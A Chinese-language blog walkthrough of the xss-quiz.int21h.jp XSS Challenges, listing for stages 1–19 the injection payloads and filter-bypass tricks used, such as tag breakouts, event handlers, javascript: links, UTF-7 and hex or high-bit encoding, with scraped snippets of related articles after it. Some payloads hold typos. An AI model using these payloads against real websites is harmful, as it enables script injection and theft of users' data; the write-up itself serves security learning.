XSS Challenges

Stage #1: http://xss-quiz.int21h.jp/?sid=2a75ff06e0147586b7ceb0fe68ee443b86a6e7b9

Hint: very simple...

按照要求输入<script>alert(document.domain);</script>

过关

Stage #2 http://xss-quiz.int21h.jp/stage2.php?sid=9532df794eb7055cab4e31fbac353c0df1960148

Hint: close the current tag and add SCRIPT tag...(关闭当前标记并添加SCRIPT标记...)

所以:"><script>alert(document.domain);</script>

过关

Stage #3  http://xss-quiz.int21h.jp/stage-3.php?sid=5a47bf8bf0dd8ce20b80f1622b66b7b061b88c7a

Hint: The input in text box is properly escaped.( 文本框中的输入已正确转义。)

因此要换个思路,文本框不行,那选择国家的框应该可以

打开调试元素,将Japan改为<script>alert(document.domain);</script>

文本框随便输入即可,过关

Stage #4 http://xss-quiz.int21h.jp/stage_4.php?sid=379f6925f33df5c6ad079263f65a97d8527fd6e3

Hint: invisible input field(不可见的输入字段)

尝试在search和country处插入xss,但是查看源码发现都被转义了,发现有个p3是hidden,所以改元素为text,看源码需要闭合

在p3里边插入"><script>alert(document.domain);</script>即可

过关

Stage #5 http://xss-quiz.int21h.jp/stage--5.php?sid=e65c978171f6ccab00dd94ae4d93428f566a88b3

Hint: length limited text box(限制了长度)

调试元素改大些长度即可

"><script>alert(document.domain);</script>

过关

Stage #6 http://xss-quiz.int21h.jp/stage-no6.php?sid=fb52b1908dfa916733f61c08a2942e03f11b0894

Hint: event handler attributes(事件处理程序属性)

" onmousemove="alert(document.domain)或" onclick=alert(document.domain) id="a,建议每次尝试之后都看下源代码

过关

Stage #7http://xss-quiz.int21h.jp/stage07.php?sid=2e71a47a9c7061dcce2b9205b52f4252bd53b443

Hint: nearly the same... but a bit more tricky.( 差不多......但有点棘手)

和第六题差不多,

和上一关一样,这里的"<>都被转义了

但事实上,用" onclick=alert(document.domain)还是可以插入,因为前面的"不影响后面的onlick点击事件

还有一种方法:1 onmouseover=alert(document.domain);

onmouseover:事件会在鼠标指针移动到指定的元素上时发生。

过关

Stage #8  http://xss-quiz.int21h.jp/stage008.php?sid=9a2b87b21da3ee6de99244f62cae1f131d34761b

Hint: the ‘javascript‘ scheme.(JavaScript样式)

js的伪协议,当点击链接的时候弹出窗口

javascript:alert(document.domain),然后出现个连接点击即可

过关

Stage #9  http://xss-quiz.int21h.jp/stage_09.php?sid=1aa32193e5e2adf2cee55de0b03e2a01494b4ba3

Hint: UTF-7 XSS

"<>都被转义了,当然也不能用onmouseover和onclick,根据提示,用UTF-7编码解码工具,将" onmousemove="alert(document.domain)转为UTF-7编码:

+ACIAIABvAG4AbQBvAHUAcwBlAG0AbwB2AGUAPQAiAGEAbABlAHIAdAAoAGQAbwBjAHUAbQBlAG4AdAAuAGQAbwBtAGEAaQBuACk-

并且修改charset为type=text,输入:UTF-7,不过不用IE7很难实验成功,或许可以抓包来提交。

过关

Stage #10 http://xss-quiz.int21h.jp/stage00010.php?sid=718360225fa9356a42c30995f38b5142c3496f6a

Hint: s/domain//g;()

可见它把domain过滤了,因此采用双写绕过

"><script>alert(document.domdomainain)</script>

过关

Stage #11 http://xss-quiz.int21h.jp/stage11th.php?sid=bddea6ab0140e0b9ec340ea96a8c8cabe33d4704

Hint: "s/script/xscript/ig;" and "s/on[a-z]+=/onxxx=/ig;" and "s/style=/stxxx=/ig;"

将script,on[a-z],style都过滤了

要将script中的某个字符转为unicode编码,或者可以插入 不可见字符

"><a href="javascr ipt:alert(document.domain);">12</a>

过关

Stage #12  http://xss-quiz.int21h.jp/stage_no012.php?sid=67fd73a52db60e5548bec6d4f987ed1d89da5192

Hint: "s/[\x00-\x20\<\>\"\‘]//g;"
  <>"被过滤,根据提示可以知道x00-,x20,&lt;,&gt;,",‘都被过滤了,但是`还没被过滤,于是可以用`加上onclick,onmouseover,onfocus均可,还有一个前提是IE,只有IE才有这个特性

不过我实验是没成功   ``onfocus=alert(document.domain)

Stage #13 http://xss-quiz.int21h.jp/stage13_0.php?sid=fd464a9d8a5423665d405be5344f9e36de07b421

Hint: style attribute(样式属性)

在CSS样式中利用expression实现javascript中的onmouseover或onmouseout事件,同样前提是IE

1:expression(onmouseover=function(){alert(document.domain)})

background-color:salmon;input:expression((window.x==1)?‘‘:(window.x=1,alert(document.domain)))(大佬的操作)

过关

Stage #14 http://xss-quiz.int21h.jp/stage-_-14.php?sid=0dd23c002d3920ff6a98176664e549f4e383dad7

Hint: s/(url|script|eval|expression)/xxx/ig;1:expre/**/ssion(onmouseover=function(){alert(document.domain)})background-color:salmon;input:e/**/xpression((window.x==1)?‘‘:(window.x=1,alert(document.domain)))过关Stage #15  http://xss-quiz.int21h.jp/stage__15.php?sid=f4ea45c94f90166a2554b794c2edc7b36a0b08e1Hint: document.write();换成16进制编码\\x3cscript\\x3ealert(document.domain);\\x3c/script\\x3e换成Unicode编码\\u003cscript\\u003ealert(document.domain);\\u003c/script\\u003e过关
Stage #16 http://xss-quiz.int21h.jp/stage00000016.php?sid=5893e43e2e6b5f621d2007deab0a0f006013cea7Hint: "document.write();" and "s/\\x/\\\\x/ig;"换成Unicode编码\\u003cscript\\u003ealert(document.domain);\\u003c/script\\u003e换成十进制\\74script\\76ealert(document.domain);\\74/script\\76过关
Stage #17 http://xss-quiz.int21h.jp/stage-No17.php?sid=a207c91d7b4cb2634e277df104c853554347e8ca
Hint: multi-byte character思路类似于宽字节注入,利用特殊字节吃掉双引号,于是抓包修改p1,p2
 p1=1%A7&p2=+onmouseover%3Dalert%28document.domain%29%3B+%A7过关
Stage #18 http://xss-quiz.int21h.jp/stage__No18.php?sid=15c9386e00551aa38970020b68c2bf714f23d132Hint: us-ascii high bit issue  将每个字符的二进制最高位置为1,然后再转为16进制 故"><script>alert(document.domain)</scirpt> 就转换为%A2%BE%BCscript%BEalert(document.domain);%BC/script%BE过关
Stage #19 http://xss-quiz.int21h.jp/stage_--19.php?sid=8e654fc6c2fe93f2c8bd38fbc6ad6b1588d859c7Hint: Twitter DomXss at Sep 24, 2010

感谢:https://www.cnblogs.com/sherlock17/p/6700430.htmlhttp://blog.knownsec.com/Knownsec_RD_Checklist/xss/xss_quiz.txt


原文地址:https://www.cnblogs.com/ls-pankong/p/9510799.html

时间: 2024-10-08 23:26:05

XSS Challenges的相关文章

xss challenges平台学习

虽然在很早之前就接触过xss,有一段时间还就着一本书研究过,但是始终没有实感,掌握的也不够系统,所以现在借着这几个平台再学习一遍 首先来玩一玩xss challenge平台 第一关:http://xss-quiz.int21h.jp/?sid=2a75ff06e0147586b7ceb0fe68ee443b86a6e7b9 第二关:http://xss-quiz.int21h.jp/stage2.php?sid=f2d7d60125bdddb208fa757ee5cdae22f6818cd1 提

escape.alf.nu XSS Challenges 8-15 之进阶的XSS

本文链接:http://blog.csdn.net/u012763794/article/details/51526725 上次讲了challenge 0-7 http://blog.csdn.net/u012763794/article/details/51507593,我的应该比别人的会详细一点吧,其实这需要有一定的xss的实践(自己搭环境搞个没过滤的就可以了),要熟悉js 废话不多说,直接上挑战,注:要alert(1)才能通关 challenge 8 function escape(s)

escape.alf.nu XSS Challenges 0-7 之一步步学XSS

本文链接:http://blog.csdn.net/u012763794/article/details/51507593 以下挑战来源于:http://escape.alf.nu/ 你可能需要html,css,javascript,正则表达式的知识,没有的赶紧学吧 之前在合天也做了一点实验总结什么的 跨站脚本攻击基础 http://blog.csdn.net/u012763794/article/details/45869479 XSS进阶一 http://blog.csdn.net/u012

XSS Challenges xss-quiz.int21h.jp

概述: https://xss-quiz.int21h.jp/ Stage #1 payload: <script>alert(document.domain);</script> Stage #2 http://xss-quiz.int21h.jp/stage2.php?sid=e93e71eed43c3ab5668af6a5aa603cf66eedce70 尝试: <script>alert(document.domain);</script> 未果 i

XSS Challenge(1)

XSS Challenges http://xss-quiz.int21h.jp/ Stage #1 注入alert(document.domain),先试一试输入后会返回什么: 返回在标签中,直接尝试输入payload: Stage #2 测试一下返回: 可以发现,test返回在value属性里,注意闭合value属性的双引号即可: Stage #3 测试一下返回情况: 通过观察源码我们可以发现一共POST了两个参数,p1和p2,通过测试发现p1被过滤了,于是用burp修改p2的值: Stag

XSS Challenge(2)

XSS Challenges http://xss-quiz.int21h.jp/ Stage #13 Hint:style attribute:要用到style属性,在style属性中有个expression属性可以来完成,但是只能是IE6以下的浏览器才支持: 将浏览器切换到IE5兼容模式,然后输入payload Stage #14 Hint:对url.script.eval.expression做了过滤,将这些单词转换成xxx,我们无法通过大小写.双写绕过,但是可以用注释绕过: Stage

A complex 16-Level XSS Challenge

A complex 16-Level XSS Challenge, held in summer 2014 (+1 Hidden Level) Index Level 0 Level 1 Level 2 Level 3 Level 4 Level 5 Level 6 Level 7 Level 8 Level 9 Level 10 Level 11 Level 12 Level 13 Level 14 Level 15 Hidden Level Rules Call prompt(1) to w

WAF——针对Web应用发起的攻击,包括但不限于以下攻击类型:SQL注入、XSS跨站、Webshell上传、命令注入、非法HTTP协议请求、非授权文件访问等

核心概念 WAF Web应用防火墙(Web Application Firewall),简称WAF. Web攻击 针对Web应用发起的攻击,包括但不限于以下攻击类型:SQL注入.XSS跨站.Webshell上传.命令注入.非法HTTP协议请求.非授权文件访问等.

爱创课堂每日一题第十二天 XSS原理及防范?

Xss(cross-site scripting)攻击指的是攻击者往Web页面里插入恶意 html标签或者javascript代码.比如:攻击者在论坛中放一个看似安全的链接,骗取用户点击后,窃取cookie中的用户私密信息:或者攻击者在论坛中加一个恶意表单,当用户提交表单的时候,却把信息传送到攻击者的服务器中,而不是用户原本以为的信任站点.XSS防范方法首先代码里对用户输入的地方和变量都需要仔细检查长度和对"<",">",";",&q